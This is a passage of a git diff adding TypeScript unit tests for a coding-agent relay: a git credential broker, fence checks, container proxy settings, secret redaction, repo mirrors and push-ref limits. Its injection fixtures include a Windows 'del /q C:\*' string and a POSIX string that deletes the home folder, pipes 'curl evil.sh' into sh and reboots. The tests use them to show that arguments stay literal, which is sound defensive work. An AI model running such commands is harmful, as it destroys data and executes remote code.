+	it("mirrors the Worker fence response status (e.g. 409 for invalid fence)", async () => {
+		const failFetch: GitBrokerOptions["fetchImpl"] = async () =>
+			new Response("fenced", { status: 409 });
+		const broker = await startGitBroker(
+			makeBrokerOptions(failFetch, { workerFenceUrl: "https://worker.test/fence-check" }),
+		);
+		try {
+			const res = await fetch(`${broker.url}/fence-check`, {
+				method: "POST",
+				headers: { "Content-Type": "application/json" },
+				body: "{}",
+			});
+			expect(res.status).toBe(409);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("returns 503 when workerFenceUrl is not configured", async () => {
+		// No workerFenceUrl in options → fence-check not available
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("t")));
+		try {
+			const res = await fetch(`${broker.url}/fence-check`, {
+				method: "POST",
+				body: "{}",
+			});
+			expect(res.status).toBe(503);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("returns 502 when the Worker fence-check call throws", async () => {
+		const errFetch: GitBrokerOptions["fetchImpl"] = async () => {
+			throw new Error("network error");
+		};
+		const broker = await startGitBroker(
+			makeBrokerOptions(errFetch, { workerFenceUrl: "https://worker.test/fence-check" }),
+		);
+		try {
+			const res = await fetch(`${broker.url}/fence-check`, {
+				method: "POST",
+				body: "{}",
+			});
+			expect(res.status).toBe(502);
+		} finally {
+			await broker.stop();
+		}
+	});
+});
+
+// ─── startGitBroker — git HTTP proxy (/gh/) ───────────────────────────────────
+
+describe("startGitBroker — git HTTP proxy (/gh/)", () => {
+	it("forwards GET /gh/ to github.com with a JIT token", async () => {
+		const captured: { url: string; headers: Record<string, string> }[] = [];
+		const recordFetch: GitBrokerOptions["fetchImpl"] = async (url, init) => {
+			const hdrs = init?.headers as Record<string, string> | undefined;
+			if (String(url).includes("github-token")) {
+				// Token issuance call
+				return new Response(JSON.stringify({ token: "ghs_jit_proxy" }), { status: 200 });
+			}
+			// git proxy call
+			captured.push({ url: String(url), headers: hdrs ?? {} });
+			return new Response("git-data", {
+				status: 200,
+				headers: { "Content-Type": "application/x-git-upload-pack-advertisement" },
+			});
+		};
+		const broker = await startGitBroker(makeBrokerOptions(recordFetch));
+		try {
+			const res = await fetch(`${broker.url}/gh/owner/repo.git/info/refs?service=git-upload-pack`);
+			expect(res.status).toBe(200);
+			expect(captured).toHaveLength(1);
+			expect(captured[0]!.url).toBe(
+				"https://github.com/owner/repo.git/info/refs?service=git-upload-pack",
+			);
+			// Authorization must be a Basic auth header with the JIT token (Base64-encoded)
+			const auth = captured[0]!.headers["Authorization"] ?? "";
+			expect(auth).toMatch(/^Basic /);
+			const decoded = atob(auth.slice("Basic ".length));
+			expect(decoded).toBe("x-access-token:ghs_jit_proxy");
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("does not expose the raw JIT token in the response body", async () => {
+		const fetchImpl: GitBrokerOptions["fetchImpl"] = async url => {
+			if (String(url).includes("github-token")) {
+				return new Response(JSON.stringify({ token: "ghs_secret_should_not_leak" }), {
+					status: 200,
+				});
+			}
+			return new Response("repo-data", { status: 200 });
+		};
+		const broker = await startGitBroker(makeBrokerOptions(fetchImpl));
+		try {
+			const res = await fetch(`${broker.url}/gh/owner/repo.git/info/refs`);
+			const body = await res.text();
+			expect(body).not.toContain("ghs_secret_should_not_leak");
+			expect(body).toBe("repo-data");
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("returns 502 when the JIT token fetch fails for a /gh/ request", async () => {
+		const failFetch: GitBrokerOptions["fetchImpl"] = async () =>
+			new Response("internal error", { status: 500 });
+		const broker = await startGitBroker(makeBrokerOptions(failFetch));
+		try {
+			const res = await fetch(`${broker.url}/gh/owner/repo.git/info/refs`);
+			expect(res.status).toBe(502);
+		} finally {
+			await broker.stop();
+		}
+	});
+});
+
+// ─── buildContainerArgs — per-job network and proxy env ───────────────────────
+
+describe("buildContainerArgs — per-job network and proxy env", () => {
+	const OPTS_WITH_NET: ContainerRunOptions = {
+		image: "ompk-runner:latest",
+		network: "ompk-job1-attempt1",
+		egressProxyUrl: "http://10.89.0.1:9999",
+		noProxyHosts: "10.89.0.1",
+	};
+
+	function envEntries(args: string[]): string[] {
+		const out: string[] = [];
+		for (let i = 0; i < args.length; i++) {
+			if (args[i] === "--env" && i + 1 < args.length) out.push(args[i + 1]!);
+		}
+		return out;
+	}
+
+	const FENCE_ENV_NET: NodeJS.ProcessEnv = {
+		OMPK_FENCE_URL: "https://worker.test/fence-check",
+		OMPK_FENCE_JOB: "job-net",
+		OMPK_FENCE_ATTEMPT: "attempt-net",
+		OMPK_FENCE_TOKEN: "token-net",
+		GIT_CONFIG_COUNT: "1",
+		GIT_CONFIG_KEY_0: "core.hooksPath",
+		GIT_CONFIG_VALUE_0: "/host/git-hooks",
+	};
+
+	it("uses the per-job network instead of host when network option is set", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "linear",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV_NET, OPTS_WITH_NET);
+		expect(args.includes("--network=ompk-job1-attempt1")).toBe(true);
+		expect(args.includes("--network=host")).toBe(false);
+	});
+
+	it("injects HTTP_PROXY and HTTPS_PROXY when egressProxyUrl is set", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "linear",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV_NET, OPTS_WITH_NET);
+		const entries = envEntries(args);
+		expect(entries.some(e => e === "HTTP_PROXY=http://10.89.0.1:9999")).toBe(true);
+		expect(entries.some(e => e === "HTTPS_PROXY=http://10.89.0.1:9999")).toBe(true);
+	});
+
+	it("injects NO_PROXY so broker/gateway traffic bypasses the CONNECT proxy", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "linear",
+		};
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV_NET, OPTS_WITH_NET);
+		const entries = envEntries(args);
+		expect(entries.some(e => e === "NO_PROXY=10.89.0.1")).toBe(true);
+	});
+
+	it("does not inject HTTP_PROXY when egressProxyUrl is absent", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "linear",
+		};
+		const { egressProxyUrl: _, noProxyHosts: __, ...optsNoProxy } = OPTS_WITH_NET;
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV_NET, optsNoProxy);
+		const entries = envEntries(args);
+		expect(entries.every(e => !e.startsWith("HTTP_PROXY="))).toBe(true);
+		expect(entries.every(e => !e.startsWith("HTTPS_PROXY="))).toBe(true);
+	});
+
+	it("sets insteadOf git config to redirect github.com through broker when broker active", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "github",
+		};
+		const args = buildContainerArgs(
+			job,
+			"/ws",
+			FENCE_ENV_NET,
+			OPTS_WITH_NET,
+			"http://10.89.0.1:8765",
+		);
+		const entries = envEntries(args);
+		// GIT_CONFIG_KEY_2 must be the insteadOf key pointing to the broker /gh/ prefix
+		expect(
+			entries.some(e => e === "GIT_CONFIG_KEY_2=url.http://10.89.0.1:8765/gh/.insteadOf"),
+		).toBe(true);
+		// GIT_CONFIG_VALUE_2 rewrites https://github.com/ to the broker prefix
+		expect(entries.some(e => e === "GIT_CONFIG_VALUE_2=https://github.com/")).toBe(true);
+		expect(entries.some(e => e === "GIT_CONFIG_COUNT=3")).toBe(true);
+	});
+
+	it("defaults to --network=host when no network option is provided", () => {
+		const job: Pick<Job, "model" | "prompt" | "source"> = {
+			model: "combo-a",
+			prompt: "p",
+			source: "linear",
+		};
+		const { network: _, egressProxyUrl: __, noProxyHosts: ___, ...bareOpts } = OPTS_WITH_NET;
+		const args = buildContainerArgs(job, "/ws", FENCE_ENV_NET, bareOpts);
+		expect(args.includes("--network=host")).toBe(true);
 	});
 });

--- a/packages/ompk-linear-agent/test/relay.test.ts
+++ b/packages/ompk-linear-agent/test/relay.test.ts
@@ -1,7 +1,31 @@
 import { describe, expect, it } from "bun:test";
 import type { ChildProcess } from "node:child_process";
 import { EventEmitter } from "node:events";
-import { buildOmpArgs, executeJob, parseAllowedModels, type SpawnFn } from "../relay/relay";
+import {
+	buildContainerArgs,
+	buildOmpArgs,
+	buildWorkspaceCloneArgs,
+	cloneWorkspaceWithMirrorFallback,
+	deriveMirrorPath,
+	executeJob,
+	fenceEnv,
+	parseAllowedModels,
+	scrubJobResult,
+	startGitBroker,
+	tryPrepareRepoMirror,
+	withLock,
+	type CloneFallbackDependencies,
+	type ContainerRunOptions,
+	type GitBrokerHandle,
+	type GitBrokerOptions,
+	type Job,
+	type MirrorDependencies,
+	type MutexMap,
+	type RunGitFn,
+	type SpawnFn,
+} from "../relay/relay";
+
+// ─── Spawn test doubles ───────────────────────────────────────────────────────
 
 /** Minimal ChildProcess double: capture spawn inputs, emit scripted output. */
 class FakeChild extends EventEmitter {
@@ -18,7 +42,7 @@ class FakeChild extends EventEmitter {
 interface SpawnCapture {
 	command: string;
 	args: readonly string[];
-	options: { cwd: string; shell?: false; env?: NodeJS.ProcessEnv };
+	options: { cwd: string; shell?: false; env?: NodeJS.ProcessEnv; detached?: boolean };
 }
 
 function makeSpawn(script: (child: FakeChild) => void): { spawn: SpawnFn; calls: SpawnCapture[] } {
@@ -32,8 +56,24 @@ function makeSpawn(script: (child: FakeChild) => void): { spawn: SpawnFn; calls:
 	return { spawn: spawnImpl, calls };
 }
 
+// ─── Fixtures ─────────────────────────────────────────────────────────────────
+
 const WINDOWS_INJECTION = 'title" && del /q C:\\* && echo "pwned';
 const POSIX_INJECTION = "title; rm -rf ~; $(curl evil.sh | sh) `reboot`";
+
+const BASE_JOB: Job = {
+	id: "job-1",
+	issueId: "issue-1",
+	issueIdentifier: "TEST-1",
+	model: "combo-a",
+	prompt: "do something",
+	status: "leased",
+	createdAt: "2026-01-01T00:00:00Z",
+	attemptId: "attempt-1",
+	leaseToken: "token-1",
+};
+
+// ─── parseAllowedModels ───────────────────────────────────────────────────────
 
 describe("parseAllowedModels", () => {
 	it("parses comma-separated ids and treats empty input as allow-nothing", () => {
@@ -42,6 +82,8 @@ describe("parseAllowedModels", () => {
 		expect(parseAllowedModels(undefined)).toEqual([]);
 	});
 });
+
+// ─── buildOmpArgs ─────────────────────────────────────────────────────────────
 
 describe("buildOmpArgs", () => {
 	it("keeps shell metacharacters as one literal argv entry behind a -- separator", () => {
@@ -60,6 +102,8 @@ describe("buildOmpArgs", () => {
 		expect(args.slice(args.indexOf("--"))).toEqual(["--", "--api-key steal"]);
 	});
 });
+
+// ─── fence environment threading ─────────────────────────────────────────────
 
 describe("fence environment threading", () => {
 	it("passes the hooks env through to the spawned process verbatim", async () => {
@@ -88,6 +132,8 @@ describe("fence environment threading", () => {
 		expect(calls[0]!.options.env).toBeUndefined();
 	});
 });
+
+// ─── executeJob ───────────────────────────────────────────────────────────────
 
 describe("executeJob", () => {
 	it("rejects a model that is not allowlisted without spawning anything", async () => {
@@ -151,5 +197,746 @@ describe("executeJob", () => {
 		const result = await executeJob({ model: "combo-a", prompt: "p" }, ["combo-a"], spawn, 1_000);
 		expect(result.success).toBe(false);
 		expect(result.failureClass).toBe("transient");
+	});
+});
+
+// ─── withLock (per-resource mutex) ───────────────────────────────────────────
+
+describe("withLock", () => {
+	it("serializes two concurrent callers with the same key", async () => {
+		const map: MutexMap = new Map();
+		const log: string[] = [];
+		let releaseFirst!: () => void;
+		const firstGate = new Promise<void>(r => {
+			releaseFirst = r;
+		});
+
+		const first = withLock(map, "R", async () => {
+			log.push("A-start");
+			await firstGate;
+			log.push("A-end");
+		});
+		const second = withLock(map, "R", async () => {
+			log.push("B");
+		});
+
+		// Drain microtask queue: B must be waiting, not running.
+		await Promise.resolve();
+		await Promise.resolve();
+		expect(log).toEqual(["A-start"]);
+
+		releaseFirst();
+		await Promise.all([first, second]);
+		expect(log).toEqual(["A-start", "A-end", "B"]);
+	});
+
+	it("allows concurrent execution for different keys", async () => {
+		const map: MutexMap = new Map();
+		const started: string[] = [];
+		let releaseA!: () => void;
+
+		const a = withLock(map, "R1", async () => {
+			started.push("A");
+			await new Promise<void>(r => {
+				releaseA = r;
+			});
+		});
+		const b = withLock(map, "R2", async () => {
+			started.push("B");
+		});
+
+		await b; // B completes immediately (different key, no wait).
+		expect(started).toContain("A"); // A started concurrently.
+		expect(started).toContain("B");
+		releaseA();
+		await a;
+	});
+
+	it("cleans up the map entry after the last caller completes", async () => {
+		const map: MutexMap = new Map();
+		await withLock(map, "R", async () => {});
+		expect(map.has("R")).toBe(false);
+	});
+
+	it("propagates errors from fn without blocking subsequent waiters", async () => {
+		const map: MutexMap = new Map();
+		const log: string[] = [];
+
+		const first = withLock(map, "R", async () => {
+			log.push("A");
+			throw new Error("intentional");
+		});
+		const second = withLock(map, "R", async () => {
+			log.push("B");
+		});
+
+		await expect(first).rejects.toThrow("intentional");
+		await second;
+		expect(log).toEqual(["A", "B"]);
+	});
+
+	it("serializes three concurrent callers in FIFO order", async () => {
+		const map: MutexMap = new Map();
+		const order: number[] = [];
+
+		// Queue all three before any run; the mutex guarantees FIFO delivery.
+		const tasks = [
+			withLock(map, "R", async () => { order.push(1); }),
+			withLock(map, "R", async () => { order.push(2); }),
+			withLock(map, "R", async () => { order.push(3); }),
+		];
+		await Promise.all(tasks);
+		expect(order).toEqual([1, 2, 3]);
+	});
+});
+
+// ─── fenceEnv ─────────────────────────────────────────────────────────────────
+
+describe("fenceEnv", () => {
+	it("sets fence triple and hooks path for a Linear job", () => {
+		const env = fenceEnv(BASE_JOB);
+		expect(env.OMPK_FENCE_URL).toMatch(/\/fence-check$/);
+		expect(env.OMPK_FENCE_JOB).toBe("job-1");
+		expect(env.OMPK_FENCE_ATTEMPT).toBe("attempt-1");
+		expect(env.OMPK_FENCE_TOKEN).toBe("token-1");
+		expect(env.GIT_CONFIG_COUNT).toBe("1");
+		expect(env.GIT_CONFIG_KEY_0).toBe("core.hooksPath");
+		expect(typeof env.GIT_CONFIG_VALUE_0).toBe("string");
+		// No JIT token variables for non-GitHub jobs.
+		expect(env.OMPK_TOKEN_URL).toBeUndefined();
+		expect(env.GH_TOKEN).toBeUndefined();
+		expect(env.GIT_CONFIG_KEY_1).toBeUndefined();
+	});
+
+	it("adds JIT token URL and credential helper for a GitHub job", () => {
+		const job: Job = {
+			...BASE_JOB,
+			source: "github",
+			githubToken: "ghs_lease_time_token",
+			github: { owner: "acme", repo: "app", number: 99, defaultBranch: "main", installationId: 12345 },
+		};
+		const env = fenceEnv(job);
+		// Lease-time token kept for gh CLI calls.
+		expect(env.GH_TOKEN).toBe("ghs_lease_time_token");
+		// JIT token endpoint for the credential helper.
+		expect(env.OMPK_TOKEN_URL).toMatch(/\/github-token$/);
+		// Second git config entry points to the credential helper.
+		expect(env.GIT_CONFIG_COUNT).toBe("2");
+		expect(env.GIT_CONFIG_KEY_1).toBe("credential.helper");
+		expect(env.GIT_CONFIG_VALUE_1).toContain("ompk-git-credential");
+	});
+
+	it("omits JIT token variables when githubToken is absent on a GitHub job", () => {
+		const job: Job = {
+			...BASE_JOB,
+			source: "github",
+			// githubToken intentionally absent
+			github: { owner: "a", repo: "b", number: 1, defaultBranch: "main", installationId: 1 },
+		};
+		const env = fenceEnv(job);
+		// Falls back to Linear-style env: single config entry, no JIT vars.
+		expect(env.GIT_CONFIG_COUNT).toBe("1");
+		expect(env.OMPK_TOKEN_URL).toBeUndefined();
+		expect(env.GH_TOKEN).toBeUndefined();
+	});
+});
+
+// ─── scrubJobResult ───────────────────────────────────────────────────────────
+
+describe("scrubJobResult", () => {
+	it("replaces the secret in output and error", () => {
+		const result = scrubJobResult(
+			{ success: false, output: "using token ghs_abc123 failed", error: "token ghs_abc123 rejected" },
+			"ghs_abc123",
+		);
+		expect(result.output).toBe("using token [redacted] failed");
+		expect(result.error).toBe("token [redacted] rejected");
+	});
+
+	it("returns the result object unchanged when no secret is given", () => {
+		const orig = { success: true, output: "done" };
+		// Same reference: no allocation when secret is undefined.
+		expect(scrubJobResult(orig, undefined)).toBe(orig);
+	});
+
+	it("redacts multiple occurrences of the secret", () => {
+		const result = scrubJobResult(
+			{ success: false, output: "tok tok tok", error: "tok" },
+			"tok",
+		);
+		expect(result.output).toBe("[redacted] [redacted] [redacted]");
+		expect(result.error).toBe("[redacted]");
+	});
+
+	it("leaves output unchanged when error is absent", () => {
+		const result = scrubJobResult({ success: true, output: "tok in output" }, "tok");
+		expect(result.output).toBe("[redacted] in output");
+		expect(result.error).toBeUndefined();
+	});
+});
+
+// ─── deriveMirrorPath ─────────────────────────────────────────────────────────
+
+describe("deriveMirrorPath", () => {
+	it("builds a path under .mirrors with owner-repo.git suffix", () => {
+		expect(deriveMirrorPath("/root", "acme", "app")).toBe("/root/.mirrors/acme-app.git");
+	});
+
+	it("sanitizes characters that are unsafe on common filesystems", () => {
+		const p = deriveMirrorPath("/root", "org/sub", "my:repo");
+		// Slashes and colons are replaced; the path stays under .mirrors.
+		expect(p).toContain("/.mirrors/");
+		expect(p).not.toContain("/org/sub");
+		expect(p).not.toContain(":");
+	});
+
+	it("produces a stable path for the same inputs", () => {
+		const p1 = deriveMirrorPath("/ws", "owner", "repo");
+		const p2 = deriveMirrorPath("/ws", "owner", "repo");
+		expect(p1).toBe(p2);
+	});
+});
+
+// ─── buildWorkspaceCloneArgs ──────────────────────────────────────────────────
+
+describe("buildWorkspaceCloneArgs", () => {
+	const CLONE_URL = "https://github.com/acme/app.git";
+	const WS = "/tmp/ws-job-1";
+
+	it("clones directly when no mirror is given", () => {
+		const args = buildWorkspaceCloneArgs(CLONE_URL, WS, undefined);
+		expect(args).toEqual(["clone", "--origin", "origin", CLONE_URL, WS]);
+	});
+
+	it("uses --reference-if-able and --dissociate when a mirror path is given", () => {
+		const MIRROR = "/mirrors/acme-app.git";
+		const args = buildWorkspaceCloneArgs(CLONE_URL, WS, MIRROR);
+		expect(args).toContain("--reference-if-able");
+		expect(args).toContain("--dissociate");
+		expect(args).toContain(MIRROR);
+		// URL and workspace are always present.
+		expect(args).toContain(CLONE_URL);
+		expect(args).toContain(WS);
+	});
+});
+
+// ─── tryPrepareRepoMirror ─────────────────────────────────────────────────────
+
+describe("tryPrepareRepoMirror", () => {
+	const MIRROR_PATH = "/mirrors/acme-app.git";
+	const CLONE_URL = "https://github.com/acme/app.git";
+
+	function fakeDeps(opts: {
+		exists?: boolean;
+		gitImpl?: RunGitFn;
+		warn?: (m: string) => void;
+	}): MirrorDependencies {
+		return {
+			runGit: opts.gitImpl ?? (async () => {}),
+			mirrorExists: async () => opts.exists ?? false,
+			makeDir: async () => {},
+			warn: opts.warn ?? (() => {}),
+		};
+	}
+
+	it("clones a fresh mirror when none exists", async () => {
+		const gitCalls: string[][] = [];
+		const mirror = await tryPrepareRepoMirror(MIRROR_PATH, CLONE_URL, {}, undefined, {
+			...fakeDeps({ exists: false, gitImpl: async args => { gitCalls.push([...args]); } }),
+		});
+		expect(mirror).toBe(MIRROR_PATH);
+		expect(gitCalls[0]).toContain("clone");
+		expect(gitCalls[0]).toContain("--mirror");
+	});
+
+	it("runs remote update --prune when the mirror already exists", async () => {
+		const gitCalls: string[][] = [];
+		const mirror = await tryPrepareRepoMirror(MIRROR_PATH, CLONE_URL, {}, undefined, {
+			...fakeDeps({ exists: true, gitImpl: async args => { gitCalls.push([...args]); } }),
+		});
+		expect(mirror).toBe(MIRROR_PATH);
+		expect(gitCalls[0]).toContain("remote");
+		expect(gitCalls[0]).toContain("update");
+		expect(gitCalls[0]).toContain("--prune");
+	});
+
+	it("returns undefined and warns when the git operation fails (degrade to full clone)", async () => {
+		const warnings: string[] = [];
+		const mirror = await tryPrepareRepoMirror(MIRROR_PATH, CLONE_URL, {}, undefined, {
+			...fakeDeps({
+				exists: false,
+				gitImpl: async () => { throw new Error("network timeout"); },
+				warn: m => warnings.push(m),
+			}),
+		});
+		expect(mirror).toBeUndefined();
+		expect(warnings).toHaveLength(1);
+		expect(warnings[0]).toContain("full clone");
+	});
+
+	it("redacts the token from warning messages", async () => {
+		const SECRET = "ghs_super_secret";
+		const warnings: string[] = [];
+		await tryPrepareRepoMirror(MIRROR_PATH, CLONE_URL, {}, SECRET, {
+			...fakeDeps({
+				exists: false,
+				gitImpl: async () => { throw new Error(`git failed: ${SECRET}`); },
+				warn: m => warnings.push(m),
+			}),
+		});
+		expect(warnings[0]).not.toContain(SECRET);
+		expect(warnings[0]).toContain("[redacted]");
+	});
+});
+
+// ─── cloneWorkspaceWithMirrorFallback ─────────────────────────────────────────
+
+describe("cloneWorkspaceWithMirrorFallback", () => {
+	const CLONE_URL = "https://github.com/acme/app.git";
+	const WORKSPACE = "/tmp/ws-job-1";
+	const CWD = "/tmp/github-workspaces";
+
+	it("clones directly when no mirror is provided", async () => {
+		const gitCalls: string[][] = [];
+		const deps: CloneFallbackDependencies = { runGit: async args => { gitCalls.push([...args]); } };
+		await cloneWorkspaceWithMirrorFallback(CLONE_URL, WORKSPACE, undefined, CWD, {}, undefined, deps);
+		expect(gitCalls).toHaveLength(1);
+		expect(gitCalls[0]).not.toContain("--reference-if-able");
+	});
+
+	it("uses the mirror reference on the first attempt", async () => {
+		const gitCalls: string[][] = [];
+		const deps: CloneFallbackDependencies = { runGit: async args => { gitCalls.push([...args]); } };
+		await cloneWorkspaceWithMirrorFallback(CLONE_URL, WORKSPACE, "/mirrors/m.git", CWD, {}, undefined, deps);
+		expect(gitCalls).toHaveLength(1);
+		expect(gitCalls[0]).toContain("--reference-if-able");
+	});
+
+	it("retries without the mirror when the reference clone fails", async () => {
+		const gitCalls: string[][] = [];
+		let attempt = 0;
+		const deps: CloneFallbackDependencies = {
+			runGit: async args => {
+				gitCalls.push([...args]);
+				if (attempt++ === 0) throw new Error("mirror object missing");
+			},
+			removeWorkspace: async () => {},
+			warn: () => {},
+		};
+		await cloneWorkspaceWithMirrorFallback(CLONE_URL, WORKSPACE, "/mirrors/m.git", CWD, {}, undefined, deps);
+		expect(gitCalls).toHaveLength(2);
+		expect(gitCalls[0]).toContain("--reference-if-able"); // first attempt used mirror
+		expect(gitCalls[1]).not.toContain("--reference-if-able"); // fallback is direct
+	});
+
+	it("redacts the token in fallback warning messages", async () => {
+		const SECRET = "ghs_tok";
+		const warnings: string[] = [];
+		let attempt = 0;
+		const deps: CloneFallbackDependencies = {
+			runGit: async () => {
+				if (attempt++ === 0) throw new Error(`git failed: token ${SECRET}`);
+			},
+			removeWorkspace: async () => {},
+			warn: m => warnings.push(m),
+		};
+		await cloneWorkspaceWithMirrorFallback(CLONE_URL, WORKSPACE, "/mirrors/m.git", CWD, {}, SECRET, deps);
+		expect(warnings[0]).not.toContain(SECRET);
+		expect(warnings[0]).toContain("[redacted]");
+	});
+});
+
+// ─── mirror lock + concurrency (via withLock) ─────────────────────────────────
+
+describe("mirror locking under concurrent access", () => {
+	it("serializes two mirror operations for the same path", async () => {
+		const locks: MutexMap = new Map();
+		const order: string[] = [];
+		let releaseFirst!: () => void;
+		const firstGate = new Promise<void>(r => { releaseFirst = r; });
+
+		const op1 = withLock(locks, "/mirrors/acme-app.git", async () => {
+			order.push("op1-start");
+			await firstGate;
+			order.push("op1-end");
+		});
+		const op2 = withLock(locks, "/mirrors/acme-app.git", async () => {
+			order.push("op2");
+		});
+
+		await Promise.resolve();
+		await Promise.resolve();
+		expect(order).toEqual(["op1-start"]); // op2 is waiting.
+
+		releaseFirst();
+		await Promise.all([op1, op2]);
+		expect(order).toEqual(["op1-start", "op1-end", "op2"]);
+	});
+
+	it("allows concurrent mirror operations for different repos", async () => {
+		const locks: MutexMap = new Map();
+		const started: string[] = [];
+
+		let releaseA!: () => void;
+		const a = withLock(locks, "/mirrors/acme-app.git", async () => {
+			started.push("A");
+			await new Promise<void>(r => { releaseA = r; });
+		});
+		const b = withLock(locks, "/mirrors/other-svc.git", async () => {
+			started.push("B");
+		});
+
+		await b;
+		// B finished; A must have started concurrently (different mirror path).
+		expect(started).toContain("A");
+		expect(started).toContain("B");
+		releaseA();
+		await a;
+	});
+});
+
+// ─── Helpers used by broker tests ─────────────────────────────────────────────
+
+/**
+ * Build a minimal GitBrokerOptions with an injectable fetch double.
+ * The workerTokenUrl is irrelevant for tests that don't exercise the
+ * /credential endpoint (push-check tests).
+ */
+function makeBrokerOptions(
+	fetchImpl: GitBrokerOptions["fetchImpl"],
+	overrides?: Partial<GitBrokerOptions>,
+): GitBrokerOptions {
+	return {
+		jobId: "job-1",
+		attemptId: "attempt-1",
+		leaseToken: "lease-1",
+		workerTokenUrl: "https://worker.test/github-token",
+		fetchImpl,
+		...overrides,
+	};
+}
+
+/** fetchImpl double that returns a JIT token response. */
+function makeTokenFetch(token: string): GitBrokerOptions["fetchImpl"] {
+	return async () =>
+		new Response(JSON.stringify({ token }), {
+			status: 200,
+			headers: { "Content-Type": "application/json" },
+		});
+}
+
+// ─── startGitBroker — credential endpoint ────────────────────────────────────
+
+describe("startGitBroker — credential endpoint", () => {
+	it("returns git credential lines for github.com via JIT token fetch", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("ghs_jit_fresh")));
+		try {
+			const res = await fetch(`${broker.url}/credential?host=github.com`);
+			expect(res.status).toBe(200);
+			const text = await res.text();
+			expect(text).toContain("username=x-access-token");
+			expect(text).toContain("password=ghs_jit_fresh");
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("refuses credentials for any host other than github.com", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("ghs_irrelevant")));
+		try {
+			for (const host of ["evil.com", "api.github.com", "raw.githubusercontent.com", ""]) {
+				const res = await fetch(`${broker.url}/credential?host=${encodeURIComponent(host)}`);
+				expect(res.status).toBe(403);
+			}
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("returns 502 when the Worker JIT fetch fails", async () => {
+		const failFetch: GitBrokerOptions["fetchImpl"] = async () =>
+			new Response("internal error", { status: 500 });
+		const broker = await startGitBroker(makeBrokerOptions(failFetch));
+		try {
+			const res = await fetch(`${broker.url}/credential?host=github.com`);
+			expect(res.status).toBe(502);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("returns 502 when the Worker response has no token field", async () => {
+		const badFetch: GitBrokerOptions["fetchImpl"] = async () =>
+			new Response(JSON.stringify({ other: "field" }), { status: 200 });
+		const broker = await startGitBroker(makeBrokerOptions(badFetch));
+		try {
+			const res = await fetch(`${broker.url}/credential?host=github.com`);
+			expect(res.status).toBe(502);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("posts the fence triple to the Worker token URL", async () => {
+		const captured: { url: string; body: string }[] = [];
+		const recordFetch: GitBrokerOptions["fetchImpl"] = async (url, init) => {
+			captured.push({ url: String(url), body: String(init?.body ?? "") });
+			return new Response(JSON.stringify({ token: "ghs_t" }), { status: 200 });
+		};
+		const broker = await startGitBroker(
+			makeBrokerOptions(recordFetch, {
+				jobId: "j-99",
+				attemptId: "att-5",
+				leaseToken: "lse-abc",
+				workerTokenUrl: "https://worker.test/github-token",
+			}),
+		);
+		try {
+			await fetch(`${broker.url}/credential?host=github.com`);
+			expect(captured).toHaveLength(1);
+			expect(captured[0]!.url).toBe("https://worker.test/github-token");
+			const parsed = JSON.parse(captured[0]!.body) as Record<string, string>;
+			expect(parsed["jobId"]).toBe("j-99");
+			expect(parsed["attemptId"]).toBe("att-5");
+			expect(parsed["leaseToken"]).toBe("lse-abc");
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("two broker instances bind to different ports", async () => {
+		const b1 = await startGitBroker(makeBrokerOptions(makeTokenFetch("t1")));
+		const b2 = await startGitBroker(makeBrokerOptions(makeTokenFetch("t2")));
+		try {
+			expect(b1.url).not.toBe(b2.url);
+		} finally {
+			await b1.stop();
+			await b2.stop();
+		}
+	});
+});
+
+// ─── startGitBroker — push-check endpoint ─────────────────────────────────────
+
+describe("startGitBroker — push-check endpoint", () => {
+	/** Start a broker and POST /push-check with the given refs. */
+	async function pushCheck(broker: GitBrokerHandle, refs: string[]): Promise<Response> {
+		return fetch(`${broker.url}/push-check`, {
+			method: "POST",
+			headers: { "Content-Type": "application/json" },
+			body: JSON.stringify({ refs }),
+		});
+	}
+
+	it("allows an empty refs list", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("t")));
+		try {
+			const res = await pushCheck(broker, []);
+			expect(res.status).toBe(200);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("allows refs/heads/ompk/* refs", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("t")));
+		try {
+			const res = await pushCheck(broker, [
+				"refs/heads/ompk/issue-1-abc12345",
+				"refs/heads/ompk/fix-something",
+			]);
+			expect(res.status).toBe(200);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("rejects a push to refs/heads/main", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("t")));
+		try {
+			const res = await pushCheck(broker, ["refs/heads/main"]);
+			expect(res.status).toBe(403);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("rejects a push to refs/heads/master", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("t")));
+		try {
+			const res = await pushCheck(broker, ["refs/heads/master"]);
+			expect(res.status).toBe(403);
+		} finally {
+			await broker.stop();
+		}
+	});
+
+	it("rejects mixed refs when any ref is outside ompk/*", async () => {
+		const broker = await startGitBroker(makeBrokerOptions(makeTokenFetch("t")));
+		try {
+			// One valid ompk/* ref + one forbidden ref — whole push must fail.
+			const res = await pushCheck(broker, [
+				"refs/heads/ompk/issue-5-deadbeef",
+				"refs/heads/release/v2",
